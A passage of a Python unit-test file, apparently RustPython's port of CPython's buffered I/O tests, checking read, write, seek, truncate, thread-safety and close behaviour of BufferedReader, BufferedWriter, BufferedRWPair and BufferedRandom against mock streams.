bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
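        # close() from another thread must mark the buffer as closed and make
        # write() raise even while the underlying flush() is still running.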
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs to
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
